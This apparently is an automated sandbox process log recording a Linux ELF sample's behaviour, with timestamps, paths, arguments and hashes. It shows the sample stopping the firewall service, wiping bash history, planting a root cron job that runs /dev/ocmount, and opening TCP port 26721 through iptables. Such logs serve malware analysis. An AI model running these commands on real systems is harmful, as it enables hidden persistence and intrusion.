                                                                MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                Start time (UTC):23:12:42
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/sbin/service
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:42
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/basename
                                                                Arguments:basename /usr/sbin/service
                                                                File size:39256 bytes
                                                                MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                Start time (UTC):23:12:42
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/sbin/service
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:42
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/systemctl
                                                                Arguments:systemctl --quiet is-active multi-user.target
                                                                File size:996584 bytes
                                                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                Start time (UTC):23:12:42
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/sbin/service
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:42
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/sbin/service
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:42
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/systemctl
                                                                Arguments:systemctl list-unit-files --full --type=socket
                                                                File size:996584 bytes
                                                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                Start time (UTC):23:12:42
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/sbin/service
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:42
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/sed
                                                                Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                                File size:121288 bytes
                                                                MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                Start time (UTC):23:12:44
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/systemctl
                                                                Arguments:systemctl stop firewall.service
                                                                File size:996584 bytes
                                                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                Start time (UTC):23:12:44
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:44
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "history -c"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:44
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:44
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "rm -rf ~/.bash_history"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:44
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:44
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/rm
                                                                Arguments:rm -rf /root/.bash_history
                                                                File size:72056 bytes
                                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                Start time (UTC):23:12:44
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:44
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "history -w"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:44
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:44
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:44
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:44
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:44
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:44
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "chmod +x /dev/ocmount"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:45
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:45
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/chmod
                                                                Arguments:chmod +x /dev/ocmount
                                                                File size:63864 bytes
                                                                MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                Start time (UTC):23:12:45
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:45
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:45
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:45
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c /dev/ocmount
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:45
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:53
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:53
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:53
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:54
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:54
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/sbin/iptables
                                                                Arguments:iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                File size:99296 bytes
                                                                MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                Start time (UTC):23:12:54
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:54
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:54
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:54
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/busybox
                                                                Arguments:/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                File size:2172376 bytes
                                                                MD5 hash:70584dffe9cb0309eb22ba78aa54bcdc

                                                                Start time (UTC):23:12:55
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:55
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:55
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:55
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:55
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:55
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:55
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:55
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:55
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:55
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/busybox
                                                                Arguments:busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                File size:2172376 bytes
                                                                MD5 hash:70584dffe9cb0309eb22ba78aa54bcdc

                                                                Start time (UTC):23:12:53
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:53
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:53
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:53
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:53
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:53
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:53
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:53
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/sbin/iptables
                                                                Arguments:iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                File size:99296 bytes
                                                                MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                Start time (UTC):23:12:53
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:53
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:54
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:54
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/busybox
                                                                Arguments:/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                File size:2172376 bytes
                                                                MD5 hash:70584dffe9cb0309eb22ba78aa54bcdc

                                                                Start time (UTC):23:12:54
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:54
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:54
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:54
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:54
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:54
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:54
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:54
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:54
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:54
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/busybox
                                                                Arguments:busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                File size:2172376 bytes
                                                                MD5 hash:70584dffe9cb0309eb22ba78aa54bcdc

                                                                Start time (UTC):23:12:53
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:53
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:53
                                                                Start date (UTC):06/10/2024
                                                                Path:/tmp/HNzkADzkE2.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):23:12:45
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/lib/systemd/systemd
                                                                Arguments:-
                                                                File size:1620224 bytes
                                                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                Start time (UTC):23:12:45
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/lib/upower/upowerd
                                                                Arguments:/usr/lib/upower/upowerd
                                                                File size:260328 bytes
                                                                MD5 hash:1253eea2fe5fe4017069664284e326cd

                                                                Start time (UTC):23:12:45
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gnome-session-binary
                                                                Arguments:-
                                                                File size:334664 bytes
                                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                Start time (UTC):23:12:45
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-wacom
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:45
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gsd-wacom
                                                                Arguments:/usr/libexec/gsd-wacom
                                                                File size:39520 bytes
                                                                MD5 hash:13778dd1a23a4e94ddc17ac9caa4fcc1

                                                                Start time (UTC):23:12:45
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gnome-session-binary
                                                                Arguments:-
                                                                File size:334664 bytes
                                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                Start time (UTC):23:12:45
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-keyboard
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gsd-keyboard
                                                                Arguments:/usr/libexec/gsd-keyboard
                                                                File size:39760 bytes
                                                                MD5 hash:8e288fd17c80bb0a1148b964b2ac2279

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/lib/systemd/systemd
                                                                Arguments:-
                                                                File size:1620224 bytes
                                                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/lib/upower/upowerd
                                                                Arguments:/usr/lib/upower/upowerd
                                                                File size:260328 bytes
                                                                MD5 hash:1253eea2fe5fe4017069664284e326cd

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gnome-session-binary
                                                                Arguments:-
                                                                File size:334664 bytes
                                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gsd-print-notifications
                                                                Arguments:/usr/libexec/gsd-print-notifications
                                                                File size:51840 bytes
                                                                MD5 hash:71539698aa691718cee775d6b9450ae2

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gvfsd-fuse
                                                                Arguments:-
                                                                File size:47632 bytes
                                                                MD5 hash:d18fbf1cbf8eb57b17fac48b7b4be933

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/fusermount
                                                                Arguments:fusermount -u -q -z -- /run/user/1000/gvfs
                                                                File size:39144 bytes
                                                                MD5 hash:576a1b135c82bdcbc97a91acea900566

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gnome-session-binary
                                                                Arguments:-
                                                                File size:334664 bytes
                                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gsd-rfkill
                                                                Arguments:/usr/libexec/gsd-rfkill
                                                                File size:51808 bytes
                                                                MD5 hash:88a16a3c0aba1759358c06215ecfb5cc
                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gnome-session-binary
                                                                Arguments:-
                                                                File size:334664 bytes
                                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-smartcard
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gsd-smartcard
                                                                Arguments:/usr/libexec/gsd-smartcard
                                                                File size:109152 bytes
                                                                MD5 hash:ea1fbd7f62e4cd0331eae2ef754ee605

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/lib/systemd/systemd
                                                                Arguments:-
                                                                File size:1620224 bytes
                                                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/lib/upower/upowerd
                                                                Arguments:/usr/lib/upower/upowerd
                                                                File size:260328 bytes
                                                                MD5 hash:1253eea2fe5fe4017069664284e326cd

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/xfce4-panel
                                                                Arguments:-
                                                                File size:375768 bytes
                                                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
                                                                File size:35136 bytes
                                                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gnome-session-binary
                                                                Arguments:-
                                                                File size:334664 bytes
                                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-datetime
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gsd-datetime
                                                                Arguments:/usr/libexec/gsd-datetime
                                                                File size:76736 bytes
                                                                MD5 hash:d80d39745740de37d6634d36e344d4bc

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/xfce4-panel
                                                                Arguments:-
                                                                File size:375768 bytes
                                                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
                                                                File size:35136 bytes
                                                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gnome-session-binary
                                                                Arguments:-
                                                                File size:334664 bytes
                                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/bin/sh
                                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-media-keys
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gsd-media-keys
                                                                Arguments:/usr/libexec/gsd-media-keys
                                                                File size:232936 bytes
                                                                MD5 hash:a425448c135afb4b8bfd79cc0b6b74da

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/bin/xfce4-panel
                                                                Arguments:-
                                                                File size:375768 bytes
                                                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
                                                                File size:35136 bytes
                                                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                                Start time (UTC):23:12:47
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/lib/systemd/systemd
                                                                Arguments:-
                                                                File size:1620224 bytes
                                                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                Start time (UTC):23:12:47
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/lib/upower/upowerd
                                                                Arguments:/usr/lib/upower/upowerd
                                                                File size:260328 bytes
                                                                MD5 hash:1253eea2fe5fe4017069664284e326cd
                                                                Start time (UTC):23:12:46
                                                                Start date (UTC):06/10/2024
                                                                Path:/usr/libexec/gnome-session-binary
                                                                Arguments:-
